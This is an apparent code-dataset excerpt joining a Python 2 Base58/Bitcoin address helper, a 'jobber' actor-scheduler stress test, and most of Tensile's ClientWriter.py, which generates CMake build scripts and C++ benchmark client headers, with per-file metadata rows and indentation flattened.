result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Bitcoin does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == '\0': nPad += 1
else: break
return (__b58chars[0]*nPad) + result
def b58decode(v, length):
""" decode v into a string of len bytes
"""
long_value = 0L
for (i, c) in enumerate(v[::-1]):
long_value += __b58chars.find(c) * (__b58base**i)
result = ''
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]: nPad += 1
else: break
result = chr(0)*nPad + result
if length is not None and len(result) != length:
return None
return result
def getNewRIPEMD160ByCrypto(public_key=""):
return RIPEMD160.new(public_key)
def getNewRIPEMD160ByHashlib(public_key=""):
newRIPEMD160 = hashlib.new('ripemd160')
newRIPEMD160.update(public_key)
return newRIPEMD160
def getNewSHA256ByCrypto(public_key=""):
return SHA256.new(public_key)
def getNewSHA256ByHashlib(public_key=""):
return hashlib.sha256(public_key)
try:
# Python Crypto library is at: http://www.dlitz.net/software/pycrypto/
# Needed for RIPEMD160 hash function, used to compute
# Bitcoin addresses from internal public keys.
import Crypto.Hash.RIPEMD160 as RIPEMD160
getNewRIPEMD160 = getNewRIPEMD160ByCrypto
except ImportError:
try:
test = getNewRIPEMD160ByHashlib()
getNewRIPEMD160 = getNewRIPEMD160ByHashlib
except ImportError:
print("Can not import RIPEMD160")
try:
# Python Crypto library is at: http://www.dlitz.net/software/pycrypto/
# Needed for RIPEMD160 hash function, used to compute
# Bitcoin addresses from internal public keys.
import Crypto.Hash.SHA256 as SHA256
getNewSHA256 = getNewSHA256ByCrypto
except ImportError:
try:
test = getNewSHA256ByHashlib()
getNewSHA256 = getNewSHA256ByHashlib
except ImportError:
print("Can not import SHA256")
def hash_160(public_key):
if getNewSHA256 == None or getNewRIPEMD160 == None:
return ''
h1 = getNewSHA256(public_key).digest()
h2 = getNewRIPEMD160(h1).digest()
return h2
def public_key_to_bc_address(public_key):
h160 = hash_160(public_key)
return hash_160_to_bc_address(h160)
def hash_160_to_bc_address(h160):
if getNewSHA256 == None:
return ''
vh160 = "\x00"+h160 # \x00 is version 0
h3=getNewSHA256(getNewSHA256(vh160).digest()).digest()
addr=vh160+h3[0:4]
return b58encode(addr)
def bc_address_to_hash_160(addr):
bytes = b58decode(addr, 25)
return bytes[1:21]
if __name__ == '__main__':
x = '005cc87f4a3fdfe3a2346b6953267ca867282630d3f9b78e64'.decode('hex_codec')
encoded = b58encode(x)
print encoded, '19TbMSWwHvnxAKy12iNm3KdbGfzfaMFViT'
print b58decode(encoded, len(x)).encode('hex_codec'), x.encode('hex_codec')
|
mit
| -4,130,492,044,310,019,000
| 25.969231
| 80
| 0.692527
| false
| 2.951178
| false
| false
| false
|
thomasquintana/jobber
|
profile.py
|
1
|
2236
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Thomas Quintana <quintana.thomas@gmail.com>
"""
Simulates the overhead of a system with 10000 actors that do nothing
Each processing 1000 messages and then shutting down.
Run with command:
python -m cProfile -s time profile.py
"""
AMOUNT_PROCESSORS = 10000
AMOUNT_MESSAGES = 1000
import unittest
from mock import create_autospec, Mock
from jobber.constants import (ACTOR_PROCESSOR_COMPLETED, ACTOR_SCHEDULER_RUNNING,
ACTOR_SCHEDULER_STOPPED, ACTOR_SCHEDULER_STOPPING)
from jobber.core.scheduler.shortest_job_next_scheduler import SJNScheduler
from jobber.core.actor.processor import ActorProcessor
from jobber.core.scheduler.actor_heap import ShortestJobNextHeap
from jobber.core.actor.actor import Actor
from jobber.core.messages.poison_pill import PoisonPill
from jobber.core.exceptions.no_messages_exception import NoMessagesException
class MockMessage(object):
pass
def stresstest():
scheduler = SJNScheduler()
mock_actor = create_autospec(Actor())
processors = [ActorProcessor(mock_actor) for _ in range(AMOUNT_PROCESSORS)]
for processor in processors:
for _ in range(AMOUNT_MESSAGES):
processor._receive_message(MockMessage())
for processor in processors:
scheduler.schedule(processor)
scheduler._state = ACTOR_SCHEDULER_RUNNING
scheduler.shutdown()
scheduler._state == ACTOR_SCHEDULER_STOPPED
scheduler.start()
if __name__=='__main__':
stresstest()
|
apache-2.0
| 1,259,529,836,510,303,700
| 32.878788
| 81
| 0.76297
| false
| 3.822222
| false
| false
| false
|
guacamoleo/Tensile
|
Tensile/ClientWriter.py
|
1
|
38398
|
################################################################################
# Copyright (C) 2016 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell cop-
# ies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IM-
# PLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNE-
# CTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
################################################################################
from Common import globalParameters, HR, pushWorkingPath, popWorkingPath, print1, CHeader, printWarning
from SolutionStructs import Solution
from SolutionWriter import SolutionWriter
import YAMLIO
import os
from subprocess import Popen
from shutil import copy as shutil_copy
from shutil import rmtree
################################################################################
# Main
################################################################################
def main( config ):
libraryLogicPath = os.path.join(globalParameters["WorkingPath"], \
globalParameters["LibraryLogicPath"])
pushWorkingPath(globalParameters["LibraryClientPath"])
##############################################################################
# Copy Source Files
##############################################################################
pushWorkingPath("source")
filesToCopy = [
"Client.cpp",
"Client.h",
"DeviceStats.h",
"ReferenceCPU.h",
"MathTemplates.cpp",
"MathTemplates.h",
"KernelHeader.h",
"Tools.h",
"CMakeLists.txt",
"TensileConfig.cmake",
"TensileConfigVersion.cmake"
]
for f in filesToCopy:
shutil_copy(
os.path.join(globalParameters["SourcePath"], f),
globalParameters["WorkingPath"] )
if globalParameters["RuntimeLanguage"] == "OCL":
shutil_copy(
os.path.join(globalParameters["SourcePath"], "FindOpenCL.cmake"),
globalParameters["WorkingPath"] )
else:
shutil_copy(
os.path.join(globalParameters["SourcePath"], "FindHIP.cmake"),
globalParameters["WorkingPath"] )
shutil_copy(
os.path.join(globalParameters["SourcePath"], "FindHCC.cmake"),
globalParameters["WorkingPath"] )
##############################################################################
# Read Logic Files
##############################################################################
logicFiles = [os.path.join(libraryLogicPath, f) for f \
in os.listdir(libraryLogicPath) \
if (os.path.isfile(os.path.join(libraryLogicPath, f)) \
and os.path.splitext(f)[1]==".yaml")]
print1("LogicFiles: %s" % logicFiles)
functions = []
functionNames = []
enableHalf = False
for logicFileName in logicFiles:
(scheduleName, deviceNames, problemType, solutionsForType, \
indexOrder, exactLogic, rangeLogic) \
= YAMLIO.readLibraryLogicForSchedule(logicFileName)
if problemType["DataType"].isHalf():
enableHalf = True
functions.append((scheduleName, problemType))
functionNames.append("tensile_%s" % (problemType))
globalParameters["EnableHalf"] = enableHalf
##############################################################################
# Write Generated Header
##############################################################################
forBenchmark = False
solutions = None
problemSizes = None
stepName = None
writeClientParameters(forBenchmark, solutions, problemSizes, stepName, \
functions)
popWorkingPath() # source
##############################################################################
# Run Build Script
##############################################################################
# if redo=true, clobber the build directory
if globalParameters["ForceRedoLibraryClient"]:
rmtree(os.path.join(globalParameters["WorkingPath"], "build"), \
ignore_errors=True)
pushWorkingPath("build")
# write runScript
path = globalParameters["WorkingPath"]
forBenchmark = False
runScriptName = writeRunScript(path, libraryLogicPath, forBenchmark)
# run runScript
process = Popen(runScriptName, cwd=globalParameters["WorkingPath"])
process.communicate()
if process.returncode:
printWarning("Benchmark Process exited with code %u" % process.returncode)
popWorkingPath() # build
popWorkingPath() # LibraryClient
################################################################################
# Write Run Script
################################################################################
def writeRunScript(path, libraryLogicPath, forBenchmark):
# create run.bat or run.sh which builds and runs
runScriptName = os.path.join(path, \
"run.%s" % ("bat" if os.name == "nt" else "sh") )
runScriptFile = open(runScriptName, "w")
echoLine = "@echo." if os.name == "nt" else "echo"
if os.name != "nt":
runScriptFile.write("#!/bin/sh\n")
q = "" if os.name == "nt" else "\""
runScriptFile.write("%s && echo %s%s%s && echo %s# Configuring CMake for Client%s && echo %s%s%s\n" \
% (echoLine, q, HR, q, q, q, q, HR, q))
runScriptFile.write("cmake")
# runtime and kernel language
runScriptFile.write(" -DTensile_RUNTIME_LANGUAGE=%s" \
% globalParameters["RuntimeLanguage"])
if globalParameters["EnableHalf"]:
runScriptFile.write(" -DTensile_ENABLE_HALF=ON")
if forBenchmark:
# for benchmark client
runScriptFile.write(" -DTensile_CLIENT_BENCHMARK=ON")
else:
# for library client
runScriptFile.write(" -DTensile_ROOT=%s" \
% os.path.join(globalParameters["ScriptPath"], "..") )
runScriptFile.write(" -DTensile_CLIENT_BENCHMARK=OFF")
runScriptFile.write(" -DTensile_LOGIC_PATH=%s" % libraryLogicPath)
runScriptFile.write(" -DTensile_LIBRARY_PRINT_DEBUG=%s" \
% ("ON" if globalParameters["LibraryPrintDebug"] else "OFF"))
runScriptFile.write(" -DTensile_SHORT_FILE_NAMES=%s" \
% ("ON" if globalParameters["ShortNames"] else "OFF"))
if globalParameters["CMakeCXXFlags"]:
runScriptFile.write(" -DCMAKE_CXX_FLAGS=%s" \
% globalParameters["CMakeCXXFlags"] )
if globalParameters["CMakeCFlags"]:
runScriptFile.write(" -DCMAKE_C_FLAGS=%s" \
% globalParameters["CMakeCFlags"] )
# for both
if os.name == "nt":
runScriptFile.write(" -DCMAKE_GENERATOR_PLATFORM=x64")
runScriptFile.write(" -DTensile_MERGE_FILES=%s" \
% ("ON" if globalParameters["MergeFiles"] else "OFF"))
runScriptFile.write(" ../source\n")
runScriptFile.write("%s && echo %s%s%s && echo %s# Building Client%s && echo %s%s%s\n" \
% (echoLine, q, HR, q, q, q, q, HR, q))
runScriptFile.write("cmake --build . --config %s%s\n" \
% (globalParameters["CMakeBuildType"], " -- -j 8" \
if os.name != "nt" else "") )
if forBenchmark:
if os.name == "nt":
runScriptFile.write(os.path.join(globalParameters["CMakeBuildType"], \
"client.exe") )
else:
if globalParameters["PinClocks"] and globalParameters["ROCmSMIPath"]:
runScriptFile.write("%s -d 0 --setfan 255 --setsclk 7\n" % globalParameters["ROCmSMIPath"])
runScriptFile.write("sleep 1\n")
runScriptFile.write("%s -d 0 -a\n" % globalParameters["ROCmSMIPath"])
runScriptFile.write("./client")
clp = ""
clp += " --platform-idx %u" % globalParameters["Platform"]
clp += " --device-idx %u" % globalParameters["Device"]
clp += " --init-alpha %u" % globalParameters["DataInitTypeAlpha"]
clp += " --init-beta %u" % globalParameters["DataInitTypeBeta"]
clp += " --init-c %u" % globalParameters["DataInitTypeC"]
clp += " --init-ab %u" % globalParameters["DataInitTypeAB"]
clp += " --print-valids %u" % globalParameters["ValidationPrintValids"]
clp += " --print-max %u" % globalParameters["ValidationMaxToPrint"]
clp += " --num-benchmarks %u" % globalParameters["NumBenchmarks"]
clp += " --num-elements-to-validate %u" % globalParameters["NumElementsToValidate"]
clp += " --num-enqueues-per-sync %u" % globalParameters["EnqueuesPerSync"]
clp += " --num-syncs-per-benchmark %u" % globalParameters["SyncsPerBenchmark"]
clp += " --use-gpu-timer %u" % globalParameters["KernelTime"]
clp += " --sleep-percent %u" % globalParameters["SleepPercent"]
runScriptFile.write(clp)
runScriptFile.write("\n")
if os.name != "nt":
if globalParameters["PinClocks"] and globalParameters["ROCmSMIPath"]:
runScriptFile.write("%s -d 0 --resetclocks\n" % globalParameters["ROCmSMIPath"])
runScriptFile.write("%s -d 0 --setfan 50\n" % globalParameters["ROCmSMIPath"])
else:
executablePath = os.path.join(globalParameters["WorkingPath"])
if os.name == "nt":
executablePath = os.path.join(executablePath, \
globalParameters["CMakeBuildType"], \
"client.exe")
else:
executablePath = os.path.join(executablePath, "client")
runScriptFile.write("%s && echo %s%s%s && echo %s# Library Client:%s && echo %s# %s%s && %s\n" \
% (echoLine, q, HR, q, q, q, q, executablePath, q, executablePath) )
runScriptFile.close()
if os.name != "nt":
os.chmod(runScriptName, 0777)
return runScriptName
################################################################################
# Write Generated Benchmark Parameters
################################################################################
def writeClientParameters(forBenchmark, solutions, problemSizes, stepName, \
functionList):
h = ""
##############################################################################
# Min Naming
##############################################################################
if forBenchmark:
kernels = []
for solution in solutions:
solutionKernels = solution.getKernels()
for kernel in solutionKernels:
if kernel not in kernels:
kernels.append(kernel)
solutionSerialNaming = Solution.getSerialNaming(solutions)
kernelSerialNaming = Solution.getSerialNaming(kernels)
solutionMinNaming = Solution.getMinNaming(solutions)
kernelMinNaming = Solution.getMinNaming(kernels)
solutionWriter = SolutionWriter( \
solutionMinNaming, solutionSerialNaming, \
kernelMinNaming, kernelSerialNaming)
if forBenchmark:
if globalParameters["MergeFiles"]:
h += "#include \"Solutions.h\"\n"
else:
for solution in solutions:
solutionName = solutionWriter.getSolutionName(solution)
h += "#include \"" + solutionName + ".h\"\n"
h += "\n"
else:
h += "#include \"Tensile.h\"\n"
h += "typedef enum {\n"
h += " enum_float,\n"
h += " enum_double,\n"
h += " enum_TensileComplexFloat,\n"
h += " enum_TensileComplexDouble\n"
h += "#ifdef Tensile_ENABLE_HALF\n"
h += " ,enum_TensileHalf\n"
h += "#endif\n"
h += "} DataTypeEnum;\n"
h += "\n"
h += "const char indexChars[%u] = \"%s" \
% (len(globalParameters["IndexChars"])+1, \
globalParameters["IndexChars"][0])
for i in range(1, len(globalParameters["IndexChars"])):
h += globalParameters["IndexChars"][i]
h += "\";\n"
h += "unsigned int functionIdx;\n"
h += "unsigned int dataTypeIdx;\n"
h += "unsigned int problemTypeIdx;\n"
h += "\n"
##############################################################################
# Problem Types
##############################################################################
#dataTypes = []
#problemTypes = []
#functionSerialToDataTypeAndIdx = []
dataTypes = []
problemTypes = []
problemTypesForDataType = {} # for data type
schedulesForProblemType = {} # for problem type
functionInfo = [] # dataTypeIdx, problemTypeIdx, idxWithinDataType, idxWithinProblemType
if forBenchmark:
problemType = solutions[0]["ProblemType"]
dataType = problemType["DataType"]
dataTypes.append(dataType)
problemTypes.append(problemType)
problemTypesForDataType[dataType] = [problemType]
schedulesForProblemType[problemType] = solutions
numProblemTypes = 1
for solution in solutions:
functionInfo.append([ 0, 0, 0, 0, 0, 0 ])
else:
for functionIdx in range(0, len(functionList)):
function = functionList[functionIdx]
scheduleName = function[0]
problemType = function[1]
dataType = problemType["DataType"]
if dataType not in dataTypes:
dataTypes.append(dataType)
problemTypesForDataType[dataType] = []
if problemType not in problemTypesForDataType[dataType]:
problemTypesForDataType[dataType].append(problemType)
schedulesForProblemType[problemType] = []
schedulesForProblemType[problemType].append(scheduleName)
# sort
dataTypes = sorted(dataTypes)
for dataType in dataTypes:
problemTypesForDataType[dataType] = \
sorted(problemTypesForDataType[dataType])
for problemType in problemTypesForDataType[dataType]:
schedulesForProblemType[problemType] = \
sorted(schedulesForProblemType[problemType])
# assign info
functionIdxSerial = 0
problemTypeIdxSerial = 0
for dataTypeIdxSerial in range(0, len(dataTypes)):
dataType = dataTypes[dataTypeIdxSerial]
functionIdxForDataType = 0
for problemTypeIdxForDataType in range(0, \
len(problemTypesForDataType[dataType])):
problemType = \
problemTypesForDataType[dataType][problemTypeIdxForDataType]
problemTypes.append(problemType)
functionIdxForProblemType = 0
for functionIdxForProblemType in range(0, \
len(schedulesForProblemType[problemType])):
functionInfo.append([ \
dataTypeIdxSerial, \
problemTypeIdxForDataType, \
problemTypeIdxSerial, \
functionIdxSerial,\
functionIdxForDataType,\
functionIdxForProblemType, \
])
functionIdxForProblemType += 1
functionIdxForDataType += 1
functionIdxSerial += 1
problemTypeIdxSerial += 1
numProblemTypes = problemTypeIdxSerial
numFunctions = functionIdxSerial
h += "const unsigned int numFunctions = %u;\n" % numFunctions
##############################################################################
# Data Types
##############################################################################
h += "/* data types */\n"
numDataTypes = len(dataTypes)
h += "const unsigned int numDataTypes = %u;\n" % numDataTypes
h += "const DataTypeEnum dataTypeEnums[numDataTypes] = { enum_%s" \
% dataTypes[0].toCpp()
for dataTypeIdx in range(1, numDataTypes):
h += ", enum_%s" % dataTypes[dataTypeIdx].toCpp();
h += " };\n"
# bytes per elements
h += "const unsigned int bytesPerElement[numDataTypes] = { %u" \
% (dataTypes[0].numBytes())
for dataTypeIdx in range(1, numDataTypes):
dataType = dataTypes[dataTypeIdx]
h += ", %u" % dataType.numBytes()
h += " };\n"
# flops per mac
h += "const unsigned int numFlopsPerMac[numDataTypes] = { %u" \
% (2 if dataTypes[0].isReal() else 8)
for dataTypeIdx in range(1, numDataTypes):
dataType = dataTypes[dataTypeIdx]
h += ", %u" % (2 if dataType.isReal() else 8)
h += " };\n"
for dataTypeIdx in range(0, numDataTypes):
h += "#define Tensile_DATA_TYPE_%s\n" \
% dataTypes[dataTypeIdx].toCpp().upper()
##############################################################################
# Problem Types
##############################################################################
h += "/* problem types */\n"
h += "const unsigned int numProblemTypes = %u;\n" % numProblemTypes
# Num C Indices
h += "const unsigned int numIndicesC[numProblemTypes] = { %u" \
% problemTypes[0]["NumIndicesC"]
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
h += ", %u" % problemType["NumIndicesC"]
h += " };\n"
# Num AB Indices
maxNumIndicesAB = len(problemTypes[0]["IndexAssignmentsA"])
h += "const unsigned int numIndicesAB[numProblemTypes] = { %u" \
% len(problemTypes[0]["IndexAssignmentsA"])
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
numIndicesAB = len(problemType["IndexAssignmentsA"])
h += ", %u" % numIndicesAB
maxNumIndicesAB = max(numIndicesAB, maxNumIndicesAB)
h += " };\n"
h += "const unsigned int maxNumIndicesAB = %u;\n" % maxNumIndicesAB
# Index Assignments A
h += "const unsigned int indexAssignmentsA[numProblemTypes][maxNumIndicesAB] = {\n"
for problemTypeIdx in range(0, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
indices = problemType["IndexAssignmentsA"]
h += " { %u" % indices[0]
for i in range(1, maxNumIndicesAB):
if i < len(indices):
h += ", %u" % indices[i]
else:
h += ", static_cast<unsigned int>(-1)"
if problemTypeIdx < numProblemTypes-1:
h += " },\n"
else:
h += " }\n"
h += "};\n"
# Index Assignments B
h += "const unsigned int indexAssignmentsB[numProblemTypes][maxNumIndicesAB] = {\n"
for problemTypeIdx in range(0, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
indices = problemType["IndexAssignmentsB"]
h += " { %u" % indices[0]
for i in range(1, maxNumIndicesAB):
if i < len(indices):
h += ", %u" % indices[i]
else:
h += ", static_cast<unsigned int>(-1)"
if problemTypeIdx < numProblemTypes-1:
h += " },\n"
else:
h += " }\n"
h += "};\n"
# beta
h += "bool useBeta[numProblemTypes] = { %s" \
% ("true" if problemTypes[0]["UseBeta"] else "false")
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
h += ", %s" % ("true" if problemType["UseBeta"] else "false")
h += " };\n"
# Complex Conjugates
h += "const bool complexConjugateA[numProblemTypes] = { %s" \
% ("true" if problemTypes[0]["ComplexConjugateA"] else "false" )
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
h += ", %s" % ("true" if problemTypes[0]["ComplexConjugateA"] else "false" )
h += " };\n"
h += "const bool complexConjugateB[numProblemTypes] = { %s" \
% ("true" if problemTypes[0]["ComplexConjugateB"] else "false" )
for problemTypeIdx in range(1, numProblemTypes):
problemType = problemTypes[problemTypeIdx]
h += ", %s" % ("true" if problemTypes[0]["ComplexConjugateB"] else "false" )
h += " };\n"
h += "\n"
if not forBenchmark:
h += "// dataTypeIdxSerial, problemTypeIdxForDataType, problemTypeIdxSerial, functionIdxSerial, functionIdxForDataType, functionIdxForProblemType\n"
first = True
h += "const unsigned int functionInfo[numFunctions][6] = {\n"
for info in functionInfo:
h += "%s{ %u, %u, %u, %u, %u, %u }" % (" " if first else ",\n ", \
info[0], info[1], info[2], info[3], info[4], info[5] )
first = False
h += " };\n"
##############################################################################
# Problem Sizes
##############################################################################
maxNumIndices = problemTypes[0]["TotalIndices"]
if not forBenchmark:
for problemType in problemTypes:
maxNumIndices = max(problemType["TotalIndices"], maxNumIndices)
h += "const unsigned int maxNumIndices = %u;\n" % maxNumIndices
h += "const unsigned int totalIndices[numProblemTypes] = { %u" \
% problemTypes[0]["TotalIndices"]
for problemTypeIdx in range(1, numProblemTypes):
h += ", %u" % problemTypes[problemTypeIdx]["TotalIndices"]
h += " };\n"
if forBenchmark:
h += "const unsigned int numProblems = %u;\n" \
% problemSizes.totalProblemSizes
h += "const unsigned int problemSizes[numProblems][%u] = {\n" \
% problemTypes[0]["TotalIndices"]
for i in range(0, problemSizes.totalProblemSizes):
line = " {%5u" %problemSizes.sizes[i][0]
for j in range(1, problemTypes[0]["TotalIndices"]):
line += ",%5u" % problemSizes.sizes[i][j]
line += " }"
h += line
if i < problemSizes.totalProblemSizes-1:
h += ","
else:
h += "};"
h += "\n"
else:
h += "unsigned int userSizes[maxNumIndices];\n"
if forBenchmark:
h += "/* problem sizes */\n"
"""
h += "const bool indexIsSized[maxNumIndices] = {"
for i in range(0, problemSizes.totalIndices):
h += " %s" % ("true" if problemSizes.indexIsSized[i] else "false")
if i < problemSizes.totalIndices-1:
h += ","
h += " };\n"
h += "const unsigned int numIndicesSized = %u;\n" \
% len(problemSizes.indicesSized)
h += "const unsigned int indicesSized[numIndicesSized][4] = {\n"
h += "// { min, stride, stride_incr, max }\n"
for i in range(0, len(problemSizes.indicesSized)):
r = problemSizes.indicesSized[i]
h += " { %u, %u, %u, %u }" % (r[0], r[1], r[2], r[3])
if i < len(problemSizes.indicesSized)-1:
h += ","
h += "\n"
h += " };\n"
numIndicesMapped = len(problemSizes.indicesMapped)
h += "const unsigned int numIndicesMapped = %u;\n" % numIndicesMapped
if numIndicesMapped > 0:
h += "#define Tensile_INDICES_MAPPED 1\n"
h += "const unsigned int indicesMapped[numIndicesMapped] = {"
for i in range(0, numIndicesMapped):
h += " %u" % problemSizes.indicesMapped[i]
if i < numIndicesMapped-1:
h += ","
h += " };\n"
else:
h += "#define Tensile_INDICES_MAPPED 0\n"
"""
##############################################################################
# Max Problem Sizes
##############################################################################
if forBenchmark:
h += "size_t maxSizeC = %u;\n" % (problemSizes.maxC)
h += "size_t maxSizeA = %u;\n" % (problemSizes.maxA)
h += "size_t maxSizeB = %u;\n" % (problemSizes.maxB)
h += "\n"
else:
h += "size_t maxSizeC;\n"
h += "size_t maxSizeA;\n"
h += "size_t maxSizeB;\n"
h += "\n"
##############################################################################
# Current Problem Size
##############################################################################
h += "/* current problem size */\n"
#h += "unsigned int fullSizes[maxNumIndices];\n"
#h += "unsigned int currentSizedIndexSizes[numIndicesSized];\n"
#h += "unsigned int currentSizedIndexIncrements[numIndicesSized];\n"
h += "\n"
##############################################################################
# Solutions
##############################################################################
if forBenchmark:
h += "/* solutions */\n"
# Problem Type Indices
h += "const unsigned int maxNumSolutions = %u;\n" % len(solutions)
h += "float solutionPerf[numProblems][maxNumSolutions]; // milliseconds\n"
h += "\n"
# Solution Ptrs
h += "typedef TensileStatus (*SolutionFunctionPointer)(\n"
argList = solutionWriter.getArgList(solutions[0]["ProblemType"], True, True, True)
for i in range(0, len(argList)):
h += " %s %s%s" % (argList[i][0], argList[i][1], \
",\n" if i < len(argList)-1 else ");\n\n")
h += "const SolutionFunctionPointer solutions[maxNumSolutions] = {\n"
for i in range(0, len(solutions)):
solution = solutions[i]
solutionName = solutionWriter.getSolutionName(solution)
h += " %s" % solutionName
if i < len(solutions)-1:
h += ","
h += "\n"
h += " };\n"
h += "\n"
# Solution Names
h += "const char *solutionNames[maxNumSolutions] = {\n"
for i in range(0, len(solutions)):
solution = solutions[i]
solutionName = solutionWriter.getSolutionName(solution)
h += " \"%s\"" % solutionName
if i < len(solutions)-1:
h += ","
h += "\n"
h += " };\n"
h += "\n"
else:
# Function Names
functionNames = []
for dataType in dataTypes:
for problemType in problemTypesForDataType[dataType]:
for scheduleName in schedulesForProblemType[problemType]:
#functionNames.append("tensile_%s_%s" % (scheduleName, problemType))
functionNames.append("tensile_%s" % (problemType))
h += "const char *functionNames[numFunctions] = {\n"
for functionIdx in range(0, len(functionNames)):
functionName = functionNames[functionIdx]
h += " \"%s\"%s\n" % (functionName, \
"," if functionIdx < len(functionNames)-1 else "" )
h += " };\n"
##############################################################################
# Runtime Structures
##############################################################################
h += "/* runtime structures */\n"
h += "TensileStatus status;\n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += "cl_platform_id platform;\n"
h += "cl_device_id device;\n"
h += "cl_context context;\n"
h += "cl_command_queue stream;\n"
else:
h += "hipStream_t stream;\n"
#h += "int deviceIdx = %u;\n" \
# % (globalParameters["Device"])
h += "\n"
h += "void *deviceC;\n"
h += "void *deviceA;\n"
h += "void *deviceB;\n"
##############################################################################
# Benchmarking and Validation Parameters
##############################################################################
h += "\n/* benchmarking parameters */\n"
#h += "const bool measureKernelTime = %s;\n" \
# % ("true" if globalParameters["KernelTime"] else "false")
#h += "const unsigned int numEnqueuesPerSync = %u;\n" \
# % (globalParameters["EnqueuesPerSync"])
#h += "const unsigned int numSyncsPerBenchmark = %u;\n" \
# % (globalParameters["SyncsPerBenchmark"])
#h += "unsigned int numElementsToValidate = %s;\n" \
# % (str(globalParameters["NumElementsToValidate"]) \
# if globalParameters["NumElementsToValidate"] >= 0 \
# else "0xFFFFFFFF" )
#h += "unsigned int validationMaxToPrint = %u;\n" \
# % globalParameters["ValidationMaxToPrint"]
#h += "bool validationPrintValids = %s;\n" \
# % ("true" if globalParameters["ValidationPrintValids"] else "false")
h += "size_t validationStride;\n"
#h += "unsigned int dataInitTypeC = %s;\n" % globalParameters["DataInitTypeC"]
#h += "unsigned int dataInitTypeAB = %s;\n" % globalParameters["DataInitTypeAB"]
h += "\n"
##############################################################################
# Generated Call to Reference
##############################################################################
h += "/* generated call to reference */\n"
h += "template<typename DataType>\n"
h += "TensileStatus generatedCallToReferenceCPU(\n"
h += " const unsigned int *sizes,\n"
h += " DataType *referenceC,\n"
h += " DataType *initialA,\n"
h += " DataType *initialB,\n"
h += " DataType alpha,\n"
h += " DataType beta) {\n"
h += " return tensileReferenceCPU(\n"
h += " referenceC,\n"
h += " initialA,\n"
h += " initialB,\n"
h += " alpha,\n"
h += " beta,\n"
h += " totalIndices[problemTypeIdx],\n"
h += " sizes,\n"
h += " numIndicesC[problemTypeIdx],\n"
h += " numIndicesAB[problemTypeIdx],\n"
h += " indexAssignmentsA[problemTypeIdx],\n"
h += " indexAssignmentsB[problemTypeIdx],\n"
h += " complexConjugateA[problemTypeIdx],\n"
h += " complexConjugateB[problemTypeIdx],\n"
h += " validationStride );\n"
h += "};\n"
h += "\n"
##############################################################################
# Generated Call to Solution
##############################################################################
if forBenchmark:
problemType = solutions[0]["ProblemType"]
h += "/* generated call to solution */\n"
h += "template<typename DataType>\n"
h += "TensileStatus generatedCallToSolution(\n"
h += " unsigned int solutionIdx,\n"
h += " const unsigned int *sizes,\n"
h += " DataType alpha,\n"
h += " DataType beta, \n"
h += " unsigned int numEvents = 0, \n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " cl_event *event_wait_list = NULL,\n"
h += " cl_event *outputEvent = NULL ) {\n"
else:
h += " hipEvent_t *startEvent = NULL,\n"
h += " hipEvent_t *stopEvent = NULL ) {\n"
h += " // calculate parameters assuming packed data\n"
# strides
indexChars = globalParameters["IndexChars"]
firstStride = 1
if problemType["UseInitialStrides"]:
firstStride = 0
lastStrideC = problemType["NumIndicesC"]
lastStrideA = len(problemType["IndexAssignmentsA"])
lastStrideB = len(problemType["IndexAssignmentsB"])
# calculate strides
for i in range(0,lastStrideC):
h += " unsigned int strideC%u%s = 1" % (i, indexChars[i])
for j in range(0, i):
h += "*sizes[%i]" % j
h += ";\n"
for i in range(0,lastStrideA):
h += " unsigned int strideA%u%s = 1" % (i, \
indexChars[problemType["IndexAssignmentsA"][i]])
for j in range(0, i):
h += "*sizes[%i]" % \
problemType["IndexAssignmentsA"][j]
h += ";\n"
for i in range(0,lastStrideB):
h += " unsigned int strideB%u%s = 1" % (i, \
indexChars[problemType["IndexAssignmentsB"][i]])
for j in range(0, i):
h += "*sizes[%i]" % \
problemType["IndexAssignmentsB"][j]
h += ";\n"
for i in range(0, problemType["TotalIndices"]):
h += " unsigned int size%s = sizes[%u];\n" % (indexChars[i], i)
h += "\n"
# function call
h += " // call solution function\n"
if globalParameters["RuntimeLanguage"] == "OCL":
h += " return solutions[solutionIdx]( static_cast<cl_mem>(deviceC), static_cast<cl_mem>(deviceA), static_cast<cl_mem>(deviceB),\n"
else:
